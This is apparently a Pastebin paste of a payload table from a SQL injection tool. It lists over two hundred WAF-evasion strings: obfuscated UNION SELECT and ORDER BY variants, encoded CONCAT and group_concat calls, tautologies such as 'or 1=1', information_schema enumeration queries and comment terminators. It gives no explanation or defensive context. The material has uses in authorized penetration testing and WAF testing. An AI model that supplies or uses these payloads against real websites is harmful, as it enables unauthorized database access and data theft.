Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- // WAF BASED / ORDERBY
- 'ORDERBY1': txt = "/**/ORDER/**/BY/**/";
- 'ORDERBY2': txt = "/*!order*/+/*!by*/";
- 'ORDERBY3': txt = "/*!ORDER BY*/";
- 'ORDERBY4': txt = "/*!50000ORDER*//**//*!50000BY*/";
- 'ORDERBY5': txt = "/*!12345ORDER*/+/*!BY*/";
- 'ORDERBY6': txt = "/*!50000ORDER BY*/";
- 'ORDERBY7': txt = "/**/**/ORDER/**/BY/**/**/";
- 'ORDERBY8': txt = "order/**_**/by";
- //WAF BASED/ UNION
- 'UNION1': txt = "/*!50000%55nIoN*/ /*!50000%53eLeCt*/";
- 'UNION2': txt = "%55nion(%53elect 1,2,3)";
- 'UNION3': txt = "+union+distinct+select+";
- 'UNION4': txt = "+union+distinctROW+select+";
- 'UNION5': txt = "+ #?uNiOn + #?sEleCt";
- 'UNION6': txt = "+ #?1q %0AuNiOn all#qa%0A#%0AsEleCt";
- 'UNION7': txt = "/*!%55NiOn*/ /*!%53eLEct*/";
- 'UNION8': txt = "+un/**/ion+se/**/lect";
- 'UNION9': txt = "UNION/*&test=1*/SELECT/*&pwn=2*/";
- 'UNION10': txt = "+?UnI?On?+'SeL?ECT?";
- 'UNION11': txt = "+(UnIoN)+(SelECT)+";
- 'UNION12': txt = "+(UnI)(oN)+(SeL)(EcT)";
- 'UNION13': txt = "+UnIoN/*&a=*/SeLeCT/*&a=*/";
- 'UNION14': txt = "+uni>on+sel>ect+";
- 'UNION15': txt = "%55nion(%53elect 1,2,3)-- -";
- 'UNION16': txt = "/**//*!12345UNION SELECT*//**/";
- 'UNION17': txt = "/**//*!50000UNION SELECT*//**/";
- 'UNION18': txt = "/**/UNION/**//*!50000SELECT*//**/";
- 'UNION19': txt = "/*!50000UniON SeLeCt*/";
- 'UNION20': txt = "union /*!50000%53elect*/";
- 'UNION21': txt = "+ #?uNiOn + #?sEleCt";
- 'UNION22': txt = "+ #?1q %0AuNiOn all#qa%0A#%0AsEleCt";
- 'UNION23': txt = "/*!%55NiOn*/ /*!%53eLEct*/";
- 'UNION24': txt = "/*!u%6eion*/ /*!se%6cect*/";
- 'UNION25': txt = "+un/**/ion+se/**/lect";
- 'UNION26': txt = "uni%0bon+se%0blect";
- 'UNION27': txt = "%2f**%2funion%2f**%2fselect";
- 'UNION28': txt = "union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A";
- 'UNION29': txt = "REVERSE(noinu)+REVERSE(tceles)";
- 'UNION30': txt = "/*--*/union/*--*/select/*--*/";
- 'UNION31': txt = "union (/*!/**/ SeleCT */ 1,2,3)";
- 'UNION32': txt = "/*!union*/+/*!select*/";
- 'UNION33': txt = "union+/*!select*/";
- 'UNION34': txt = "/**/union/**/select/**/";
- 'UNION35': txt = "/**/uNIon/**/sEleCt/**/";
- 'UNION36': txt = "+%2F**/+Union/*!select*/";
- 'UNION37': txt = "/**//*!union*//**//*!select*//**/";
- 'UNION38': txt = "/*!uNIOn*/ /*!SelECt*/";
- 'UNION39': txt = "uNiOn aLl sElEcT";
- 'UNION40': txt = "UNIunionON+SELselectECT";
- 'UNION41': txt = "/**/union/*!50000select*//**/";
- 'UNION42': txt = "0%a0union%a0select%09";
- 'UNION43': txt = "%0Aunion%0Aselect%0A";
- 'UNION44': txt = "%55nion/**/%53elect";
- 'UNION45': txt = 'uni<on all="" sel="">/*!20000%0d%0aunion*/+/*!20000%0d%0aSelEct*/';
- 'UNION46': txt = "%252f%252a*/UNION%252f%252a /SELECT%252f%252a*/";
- 'UNION47': txt = "%0A%09UNION%0CSELECT%10NULL%";
- 'UNION48': txt = "/*!union*//*--*//*!all*//*--*//*!select*/";
- 'UNION49': txt = "union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A1% 2C2%2C";
- 'UNION50': txt = "/*!20000%0d%0aunion*/+/*!20000%0d%0aSelEct*/";
- 'UNION51': txt = "+UnIoN/*&a=*/SeLeCT/*&a=*/";
- 'UNION52': txt = "union+sel%0bect";
- 'UNION53': txt = "+uni*on+sel*ect+";
- 'UNION54': txt = "+#1q%0Aunion all#qa%0A#%0Aselect";
- 'UNION55': txt = "union(select (1),(2),(3),(4),(5))";
- 'UNION56': txt = "UNION(SELECT(column)FROM(table))";
- 'UNION57': txt = "%23xyz%0AUnIOn%23xyz%0ASeLecT+";
- 'UNION58': txt = "%23xyz%0A%55nIOn%23xyz%0A%53eLecT+";
- 'UNION59': txt = "union(select(1),2,3)";
- 'UNION60': txt = "union (select 1111,2222,3333)";
- 'UNION61': txt = "uNioN (/*!/**/ SeleCT */ 11)";
- 'UNION62': txt = "union (select 1111,2222,3333)";
- 'UNION63': txt = "+#1q%0AuNiOn all#qa%0A#%0AsEleCt";
- 'UNION64': txt = "/**//*U*//*n*//*I*//*o*//*N*//*S*//*e*//*L*//*e*//*c*//*T*/";
- 'UNION65': txt = "%0A/**//*!50000%55nIOn*//*yoyu*/all/**/%0A/*!%53eLEct*/%0A/*nnaa*/";
- 'UNION66': txt = "+%23sexsexsex%0AUnIOn%23sexsexs ex%0ASeLecT+";
- 'UNION67': txt = "+union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A1% 2C2%2C";
- 'UNION68': txt = "/*!f****U%0d%0aunion*/+/*!f****U%0d%0aSelEct*/";
- 'UNION69': txt = "+%23blobblobblob%0aUnIOn%23blobblobblob%0aSeLe cT+";
- 'UNION70': txt = "/*!blobblobblob%0d%0aunion*/+/*!blobblobblob%0d%0aSelEct*/";
- 'UNION71': txt = "/union\\sselect/g";
- 'UNION72': txt = "/union\\s+select/i";
- 'UNION73': txt = "/*!UnIoN*/SeLeCT";
- 'UNION74': txt = "+UnIoN/*&a=*/SeLeCT/*&a=*/";
- 'UNION75': txt = "+uni>on+sel>ect+";
- 'UNION76': txt = "+(UnIoN)+(SelECT)+";
- 'UNION77': txt = "+(UnI)(oN)+(SeL)(EcT)";
- 'UNION78': txt = "+?UnI?On?+'SeL?ECT?";
- 'UNION79': txt = "+uni on+sel ect+";
- 'UNION80': txt = "+/*!UnIoN*/+/*!SeLeCt*/+";
- 'UNION81': txt = "/*!u%6eion*/ /*!se%6cect*/";
- 'UNION82': txt = "uni%20union%20/*!select*/%20";
- 'UNION83': txt = "union%23aa%0Aselect";
- 'UNION84': txt = "/**/union/*!50000select*/";
- 'UNION85': txt = "/^****union.*$/ /^****select.*$/";
- 'UNION86': txt = "/*union*/union/*select*/select+";
- 'UNION87': txt = "/*uni X on*/union/*sel X ect*/";
- 'UNION88': txt = "+un/**/ion+sel/**/ect+";
- 'UNION89': txt = "+UnIOn%0d%0aSeleCt%0d%0a";
- 'UNION90': txt = "UNION/*&test=1*/SELECT/*&pwn=2*/";
- 'UNION91': txt = 'un?<ion sel="">+un/**/ion+se/**/lect+';
- 'UNION92': txt = "+UNunionION+SEselectLECT+";
- 'UNION93': txt = "+uni%0bon+se%0blect+";
- 'UNION94': txt = "%252f%252a*/union%252f%252a /select%252f%252a*/";
- 'UNION95': txt = "/%2A%2A/union/%2A%2A/select/%2A%2A/";
- 'UNION96': txt = "%2f**%2funion%2f**%2fselect%2f**%2f";
- 'UNION97': txt = "union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A";
- 'UNION98': txt = "/*!UnIoN*/SeLecT+";
- 'UNION99': txt = "/*!50000UnION*//*!50000SeLeCt*/";
- 'UNION100': txt = "')AnD null UNiON SeLeCt 1,2,3,4,5;%00";
- 'UNION101': txt = "')AnD null UNiON SeLeCt 1,2,3,4,5+--+";
- 'UNION102': txt = "' And True Union Select 1,2,3;%00";
- 'UNION103': txt = "' And False Union Select 1,2,3;%00";
- 'UNION104': txt = "' And True Union Select 1,2,3+--+";
- 'UNION105': txt = "' And False Union Select 1,2,3+--+";
- //WAF BASED/CONCAT
- 'CONCAT1': txt = "CoNcAt()";
- 'CONCAT2': txt = "CON%08CAT()";
- 'CONCAT3': txt = "%0AcOnCat()";
- 'CONCAT4': txt = "/**//*!12345cOnCat*/";
- 'CONCAT5': txt = "/*!50000cOnCat*/(/*!*/)";
- 'CONCAT6': txt = "unhex(hex(concat(table_name)))";
- 'CONCAT7': txt = "unhex(hex(/*!12345concat*/(table_name)))";
- 'CONCAT8': txt = "unhex(hex(/*!50000concat*/(table_name)))";
- //Group Concat
- 'group_concat 1': txt = '/*!group_concat*/()';
- 'group_concat 2': txt = 'gRoUp_cOnCAt()';
- 'group_concat 3': txt = 'group_concat(/*!*/)';
- 'group_concat 4': txt = 'group_concat(/*!12345table_name*/)';
- 'group_concat 5': txt = 'group_concat(/*!50000table_name*/)';
- 'group_concat 6': txt = '/*!group_concat*/(/*!12345table_name*/)';
- 'group_concat 7': txt = '/*!group_concat*/(/*!50000table_name*/)';
- 'group_concat 8': txt = '/*!12345group_concat*/(/*!12345table_name*/)';
- 'group_concat 9': txt = '/*!50000group_concat*/(/*!50000table_name*/)';
- 'group_concat 10': txt = '/*!GrOuP_ConCaT*/()';
- 'group_concat 11': txt = '/*!12345GroUP_ConCat*/()';
- 'group_concat 12': txt = '/*!50000gRouP_cOnCaT*/()';
- 'group_concat 13': txt = '/*!50000Gr%6fuP_c%6fnCAT*/()';
- 'group_concat 14': txt = 'unhex(hex(group_concat(table_name)))';
- 'group_concat 15': txt = 'unhex(hex(/*!group_concat*/(/*!table_name*/)))';
- 'group_concat 16': txt = 'unhex(hex(/*!12345group_concat*/(table_name)))';
- 'group_concat 17': txt = 'unhex(hex(/*!12345group_concat*/(/*!table_name*/)))';
- 'group_concat 18': txt = 'unhex(hex(/*!12345group_concat*/(/*!12345table_name*/)))';
- 'group_concat 19': txt = 'unhex(hex(/*!50000group_concat*/(table_name)))';
- 'group_concat 20': txt = 'unhex(hex(/*!50000group_concat*/(/*!table_name*/)))';
- 'group_concat 21': txt = 'unhex(hex(/*!50000group_concat*/(/*!50000table_name*/)))';
- 'group_concat 22': txt = 'convert(group_concat(table_name)+using+ascii)';
- 'group_concat 23': txt = 'convert(group_concat(/*!table_name*/)+using+ascii)';
- 'group_concat 24': txt = 'convert(group_concat(/*!12345table_name*/)+using+ascii)';
- 'group_concat 25': txt = 'convert(group_concat(/*!50000table_name*/)+using+ascii)';
- 'group_concat 26': txt = 'CONVERT(group_concat(table_name)+USING+latin1)';
- 'group_concat 27': txt = 'CONVERT(group_concat(table_name)+USING+latin2)';
- 'group_concat 28': txt = 'CONVERT(group_concat(table_name)+USING+latin3)';
- 'group_concat 29': txt = 'CONVERT(group_concat(table_name)+USING+latin4)';
- 'group_concat 30': txt = 'CONVERT(group_concat(table_name)+USING+latin5)';
- //WAF BASED/ NUMBER
- 'NUMBER1': txt = "+div+0";
- 'NUMBER2': txt = "+div false+";
- 'NUMBER3': txt = "+Having+1=0+";
- 'NUMBER4': txt = "+Having false+";
- 'NUMBER5': txt = "+and false+";
- 'NUMBER6': txt = "+and null+";
- 'NUMBER7': txt = "+AND+1=0+";
- 'NUMBER8': txt = "+and+(1)=(0)+";
- 'NUMBER9': txt = "+and+(1)!=(0)+";
- 'NUMBER10': txt = "+and+2>3+";
- 'NUMBER11': txt = "%26%26 null";
- //calculation statement
- 'or 1': txt = "or 1=1";
- 'or 2': txt = "or 0=0";
- 'or 3': txt = "or 25-10-5=5";
- 'or 4': txt = "or 20-5-5=10";
- 'or 5': txt = "or 25-5-5=15";
- 'or 6': txt = "or 5*5*1=25";
- 'or 7': txt = "or 10+10+5=30";
- 'or 8': txt = "Or 1 Less Than 0";
- //MOD WAF
- 'mod 1': txt = "and point(29,9)";
- 'mod 2': txt = "and mod(9,4)";
- 'mod 3': txt = "and power(5,5)";
- 'mod 4': txt = "and Radians(point(53,12))";
- 'mod 5': txt = "and polygon(point(53,12))";
- 'mod 6': txt = "Multipolygon(point(53,12))";
- 'mod 7': txt = "Linestring(point(53,12))";
- 'mod 8': txt = "Multilinestring(point(53,12))";
- 'mod 9': txt = "Geometrycollection(point(53,12))";
- //WAF BASED/ SCHEMA
- 'SCHEMA1': txt = "/*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/=schEMA()-- -";
- 'SCHEMA2': txt = "/*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/ like schEMA()-- -";
- 'SCHEMA3': txt = "/*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/=database()-- -";
- 'SCHEMA4': txt = "/*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/ like database()-- -";
- 'SCHEMA5': txt = "/*!FrOm*/+%69nformation_schema./**/columns+/*!50000Where*/+/*!%54able_name*/=hex table/*!FrOm*/+information_schema./**/columns+/*!12345Where*/+/*!%54able_name*/ like hex table";
- 'SCHEMA6': txt = "/*!50000frOm*/+/*!50000information_schema*/%252e/**/columns";
- //WAF BASED/ FIX POINT
- 'FIX POINT1': txt = "--";
- 'FIX POINT2': txt = "-- -";
- 'FIX POINT3': txt = "--+-";
- 'FIX POINT4': txt = ")--";
- 'FIX POINT5': txt = ")-- -";
- 'FIX POINT6': txt = ")--+-";
- 'FIX POINT7': txt = "))--";
- 'FIX POINT8': txt = "))-- -";
- 'FIX POINT9': txt = "))--+-";
- 'FIX POINT10': txt = ";%00";
- 'FIX POINT11': txt = ") ;%00";
- 'FIX POINT12': txt = "));%00";
- 'FIX POINT13': txt = "%23";
- 'FIX POINT14': txt = "%60";
- 'FIX POINT15': txt = "%90";
- 'FIX POINT16': txt = "and 1=1";
- 'FIX POINT17': txt = "and '1'='1";
- 'FIX POINT18': txt = "and (1)=(1 ";
- 'FIX POINT19': txt = "php?id=(1) -- -";
- 'FIX POINT20': txt = "'--+-";
- 'FIX POINT21': txt = "')-- -";
- 'FIX POINT22': txt = "')--+-";
- 'FIX POINT23': txt = "'))-- -";
- 'FIX POINT24': txt = "'))--+-";
- 'FIX POINT25': txt = "';%00";
- 'FIX POINT26': txt = "');%00";
- 'FIX POINT27': txt = "'));%00";
- 'FIX POINT28': txt = "'%23";
- 'FIX POINT29': txt = "'%60";
- 'FIX POINT30': txt = "'%90";
- 'FIX POINT31': txt = "' and 1=1";
- 'FIX POINT32': txt = "' and '1'='1";
- 'FIX POINT33': txt = "' and (1)=(1 ";
- 'FIX POINT34': txt = "php?id=(1') -- -";
- 'FIX POINT35': txt = "\"-- -";
- 'FIX POINT36': txt = "\"--+-";
- 'FIX POINT37': txt = "\"%23";
- 'FIX POINT38': txt = "\")-- -";
- 'FIX POINT39': txt = "\")--+-";
- 'FIX POINT40': txt = "\"))--+-";
- 'FIX POINT41': txt = "\";%00";
- 'FIX POINT42': txt = "\") ;%00";
- 'FIX POINT43': txt = "\"));%00";
- 'FIX POINT44': txt = "\"%60";
- 'FIX POINT45': txt = "\"%90";
- 'FIX POINT46': txt = "\" and 1=1";
- 'FIX POINT47': txt = "\" and '1'='1";
- 'FIX POINT48': txt = "\" and (1)=(1 ";
- 'FIX POINT49': txt = "php?id=(1\") -- -";
- //FIX TAB 2
- //case 'FIX POINT50': txt = "and x(point(0,0)) -- -";
- // break;
- 'FIX POINT50': txt = "/*";
- 'FIX POINT51': txt = "--/*";
- 'FIX POINT52': txt = "\\--+";
- 'FIX POINT53': txt = "\\-- +";
- 'FIX POINT54': txt = "#--+";
- 'FIX POINT55': txt = "#-- -";
- 'FIX POINT56': txt = "--++";
- 'FIX POINT57': txt = "+--+";
- 'FIX POINT58': txt = "'))%23";
- 'FIX POINT59': txt = "a'))%60";
- 'FIX POINT60': txt = "'));%00";
- 'FIX POINT61': txt = "');%00";
- 'FIX POINT62': txt = "')order by 10;%00";
- //FIX TAB 3
- 'FIX POINT63': txt = "AND'1";
- 'FIX POINT64': txt = "or'1";
- 'FIX POINT65': txt = "AND1='1";
- 'FIX POINT66': txt = "and 1=0";
- 'FIX POINT67': txt = "') and true";
- 'FIX POINT68': txt = "') and false";
- 'FIX POINT69': txt = "') or true";
- 'FIX POINT70': txt = "') or false";
- 'FIX POINT71': txt = "' and true";
- 'FIX POINT72': txt = "' and false";
- 'FIX POINT73': txt = "' or true";
- 'FIX POINT74': txt = "' or false";
- 'FIX POINT75': txt = "and x(point(0,0)) -- -";
Add Comment
Please, Sign In to add comment